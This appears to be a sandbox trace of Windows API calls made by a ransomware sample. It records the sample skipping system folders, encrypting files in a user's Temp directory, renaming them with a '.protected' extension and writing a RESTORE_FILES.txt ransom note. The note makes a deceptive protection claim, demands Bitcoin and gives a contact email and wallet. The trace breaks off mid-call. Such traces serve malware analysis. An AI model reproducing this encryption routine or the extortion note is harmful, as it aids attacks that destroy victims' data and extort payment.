[0086.774] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.774] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.774] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.774] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.774] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\.") returned 62 [0086.774] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.774] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.774] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.774] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.774] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.775] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.775] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.775] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.775] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.775] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.775] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.775] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\..") returned 63 [0086.775] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.775] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.775] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.775] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.775] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.775] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.775] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0086.775] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0086.775] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0086.775] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0086.775] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0086.775] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.775] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0086.776] StrStrW (lpFirst="index.dat", 
lpSrch=".txt") returned 0x0 [0086.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0086.776] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0086.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat") returned 70 [0086.776] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0086.776] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0086.780] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.781] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0086.781] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.781] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0086.781] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0086.781] CloseHandle (hObject=0x14c) returned 1 [0086.781] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat.protected") returned 80 [0086.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\index.dat.protected")) returned 1 [0086.782] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.782] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.783] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\RESTORE_FILES.txt") returned 78 [0086.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Cookies\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\cookies\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.783] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.783] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.784] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.784] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.784] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.784] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.785] CloseHandle (hObject=0xd8) returned 1 [0086.785] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="Windows") returned -1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="Program Files") returned -1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="Program Files (x86)") returned -1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="$Recycle.bin") returned 1 [0086.785] lstrcmpiW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="System Volume Information") returned -1 [0086.785] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp") returned 73 [0086.785] StrStrIW (lpFirst="dYj_QL4r6Cr5gjeC.odp", lpSrch=".protected") returned 0x0 [0086.785] lstrcmpW (lpString1="dYj_QL4r6Cr5gjeC.odp", lpString2="RESTORE_FILES.txt") returned -1 [0086.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.785] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) 
returned 1 [0086.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\dyj_ql4r6cr5gjec.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp") returned 73 [0086.785] StrStrW (lpFirst="dYj_QL4r6Cr5gjeC.odp", lpSrch=".txt") returned 0x0 [0086.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp") returned 73 [0086.785] StrStrW (lpFirst="dYj_QL4r6Cr5gjeC.odp", lpSrch=".rar") returned 0x0 [0086.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp") returned 73 [0086.786] StrStrW (lpFirst="dYj_QL4r6Cr5gjeC.odp", lpSrch=".zip") returned 0x0 [0086.786] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.786] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.786] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.787] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.787] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, 
lpOverlapped=0x0) returned 1 [0086.787] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.787] CloseHandle (hObject=0xd8) returned 1 [0086.788] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp.protected") returned 83 [0086.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\dyj_ql4r6cr5gjec.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\dYj_QL4r6Cr5gjeC.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\dyj_ql4r6cr5gjec.odp.protected")) returned 1 [0086.789] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Windows") returned -1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Program Files") returned -1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Program Files (x86)") returned -1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="$Recycle.bin") returned 1 [0086.789] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="System Volume Information") returned -1 [0086.789] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 75 [0086.789] StrStrIW (lpFirst="FXSAPIDebugLogFile.txt", lpSrch=".protected") returned 0x0 [0086.789] lstrcmpW (lpString1="FXSAPIDebugLogFile.txt", lpString2="RESTORE_FILES.txt") returned -1 [0086.789] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.789] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.790] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="Windows") returned -1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="Program Files") returned -1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="Program Files (x86)") returned -1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="$Recycle.bin") returned 1 [0086.790] lstrcmpiW (lpString1="Gjm5o.doc", lpString2="System Volume Information") returned -1 [0086.790] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc") returned 62 [0086.790] StrStrIW (lpFirst="Gjm5o.doc", lpSrch=".protected") returned 0x0 [0086.790] lstrcmpW (lpString1="Gjm5o.doc", lpString2="RESTORE_FILES.txt") returned -1 [0086.790] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.790] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gjm5o.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc") returned 62 [0086.791] StrStrW (lpFirst="Gjm5o.doc", lpSrch=".txt") returned 0x0 [0086.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc") returned 62 [0086.791] StrStrW (lpFirst="Gjm5o.doc", lpSrch=".rar") returned 0x0 [0086.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc") returned 62 [0086.791] StrStrW (lpFirst="Gjm5o.doc", lpSrch=".zip") returned 0x0 [0086.791] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.792] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.792] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.792] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.792] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.792] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, 
lpOverlapped=0x0) returned 1 [0086.793] CloseHandle (hObject=0xd8) returned 1 [0086.793] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc.protected") returned 72 [0086.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gjm5o.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Gjm5o.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gjm5o.doc.protected")) returned 1 [0086.794] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="Windows") returned -1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="Program Files") returned -1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="Program Files (x86)") returned -1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="$Recycle.bin") returned 1 [0086.794] lstrcmpiW (lpString1="GoxtxhkLQv.m4a", lpString2="System Volume Information") returned -1 [0086.794] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a") returned 67 [0086.794] StrStrIW (lpFirst="GoxtxhkLQv.m4a", lpSrch=".protected") returned 0x0 [0086.794] lstrcmpW (lpString1="GoxtxhkLQv.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0086.794] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.795] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\goxtxhklqv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a") returned 67 [0086.795] StrStrW (lpFirst="GoxtxhkLQv.m4a", lpSrch=".txt") returned 0x0 [0086.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a") returned 67 [0086.795] StrStrW (lpFirst="GoxtxhkLQv.m4a", lpSrch=".rar") returned 0x0 [0086.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a") returned 67 [0086.795] StrStrW (lpFirst="GoxtxhkLQv.m4a", lpSrch=".zip") returned 0x0 [0086.795] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.796] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.796] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.797] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.797] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, 